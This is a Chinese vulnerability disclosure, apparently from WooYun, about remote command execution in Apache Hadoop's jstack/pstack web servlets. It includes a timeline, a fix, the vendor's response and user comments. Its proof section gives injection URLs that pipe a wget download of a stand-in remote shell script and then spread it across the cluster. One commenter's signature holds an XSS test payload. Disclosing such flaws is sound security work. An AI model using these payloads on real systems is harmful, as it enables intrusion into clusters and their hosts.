漏洞概要
关注数(24)
关注此漏洞
漏洞标题:Apache Hadoop远程命令执行
提交时间:2013-03-18 23:51
修复时间:2013-05-02 23:52
公开时间:2013-05-02 23:52
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2013-03-18: 细节已通知厂商并且等待厂商处理中
2013-03-22: 厂商已经确认,细节仅向厂商公开
2013-04-01: 细节向核心白帽子及相关领域专家公开
2013-04-11: 细节向普通白帽子公开
2013-04-21: 细节向实习白帽子公开
2013-05-02: 细节向公众公开
简要描述:
通过hadoop,hbase,hdfs0.2 RC版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群
详细说明:
通过hadoop,hbase,hdfs低版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群。
漏洞证明:
通过hadoop,hbase,hdfs0.2 RC版本的管理web端能远程执行命令,通过该节点对集群服务器进行任务分发(该是基本功能,当然可以进行批量提权linux主机)渗透进hadoop集群。原因是 jstack pstack servlet 执行命令
远程执行命令,
http://hadoop_host:50060/pstack?pid=123|wget http://somehost/shell.sh
http://hadoop_host:50060/jstack?pid=123|wget http://somehost/shell.sh
进行任务分发,批量对集群进行命令执行
http://hadoop_host/pstack?pid=123|home/work/hadoop/streaming.jar /home/shell.sh
http://hadoop_host/jstack?pid=123|home/work/hadoop/streaming.jar /home/shell.sh
修复方案:
进行升级至最新稳定版本,对应服务器的默认50070,50075,50090端口的访问控制。
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2013-03-22 17:02
厂商回复:
先行确认,暂未在生产系统实例中复现。已作为重要事件列入处置队列。
按相邻网络攻击进行评估,rank=5.96*1.3*1.8(云安全)=13.946
最新状态:
暂无
漏洞评价:
评论
-
2013-03-19 00:19 |
心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)
-
2013-03-19 00:23 |
kindle ( 实习白帽子 | Rank:40 漏洞数:12 | hh)
-
2013-03-19 01:46 |
园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)
-
2013-03-19 03:00 |
El4pse ( 路人 | Rank:29 漏洞数:7 | 世界上从来没有不可能这几个字,可不可能完...)
-
2013-03-19 07:12 |
shine ( 普通白帽子 | Rank:831 漏洞数:76 | coder)
前提是要能进管理web端? 个人觉得产品的基本功能设计是没问题的,因为管理端是在所有节点顶端,拥有其他节点的控制或操作权限是正常的,不然一些基本功能的实现不好搞,不过这对渗透其他节点的主机提供了方便。另外,我是来看洞主提权有什么新技巧的?
-
2013-03-19 08:49 |
Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:209 | 于是我们奋力向前游,逆流而上的小舟,不停...)
-
2013-03-19 08:54 |
uni3orns ( 路人 | Rank:24 漏洞数:2 | 过来膜拜各位洞主的)
-
2013-03-19 09:24 |
Bincker ( 普通白帽子 | Rank:193 漏洞数:23 )
@shine 管理端是个展示集群运行状态页面,类似apache默认index ,和log记录等,情况。几个端口没进行授权验证,log文件可以遍历,ps 可观察节点进程状态不过信息泄漏外没什么太大利用价值。厂商hadoop版本过低可需紧急进行升级操作。
-
2013-03-19 09:36 |
none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)
-
2013-03-19 09:40 |
shine ( 普通白帽子 | Rank:831 漏洞数:76 | coder)
@Bincker 恩!见过,是这个?http://zone.wooyun.org/content/2970那洞主的意思让我再强烈关注一下!
-
2013-03-19 10:24 |
Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)
-
2013-03-19 11:08 |
shine ( 普通白帽子 | Rank:831 漏洞数:76 | coder)
@Enjoy_Hacking 。。。公开不就能看到图片了?都这么激动!
-
2013-03-19 11:49 |
马燕羊蝎子 ( 实习白帽子 | Rank:83 漏洞数:10 | 亲,啥时候请吃马燕羊蝎子。)
-
2013-03-19 13:35 |
shine ( 普通白帽子 | Rank:831 漏洞数:76 | coder)
@马燕羊蝎子 关键你要找到hadoop对应项目及版本,可能是要进hbase的一类管理组件(这个嘛...),我猜Apache恐怕不会承认这是个漏洞,算是个安全问题吧!
-
2013-03-19 13:44 |
马燕羊蝎子 ( 实习白帽子 | Rank:83 漏洞数:10 | 亲,啥时候请吃马燕羊蝎子。)
-
2013-03-22 17:54 |
0x7c ( 路人 | Rank:4 漏洞数:4 | 我的0day用完了)
虽然我不知道你们在说什么,但是好像很厉害的样子耶。
-
2013-03-22 18:08 |
sql ( 核心白帽子 | Rank:1127 漏洞数:109 | 带着两个MM(mysql,mssql),玩3p(asp,php...)
虽然我不知道你们在说什么,但看起来好像很牛逼的样子耶。
-
2013-03-22 22:16 |
小色 ( 路人 | Rank:0 漏洞数:1 | 撸的一手好管)
-
2013-03-23 11:47 |
txcbg ( 普通白帽子 | Rank:391 漏洞数:53 | 说点什么呢?)
-
2013-03-23 22:01 |
Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)
-
2013-05-03 09:04 |
possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)
-
2013-05-03 10:00 |
慕林 ( 路人 | Rank:16 漏洞数:1 | 好钻研, 爱安全)
-
2013-05-08 13:59 |
慕林 ( 路人 | Rank:16 漏洞数:1 | 好钻研, 爱安全)
50060是web UI of the TaskTracker daemon的端口吧? 我用hadoop-0.20.0版本的, 部署后,访问“http://hadoop_host:50060/jstack”报404错误。 是我版本用的不对?
-
2014-04-24 10:11 |
小贱人 ( 路人 | Rank:4 漏洞数:3 | 资深菜鸟,)
-
2014-07-14 15:39 |
luwikes ( 普通白帽子 | Rank:512 漏洞数:68 | 潜心学习~~~)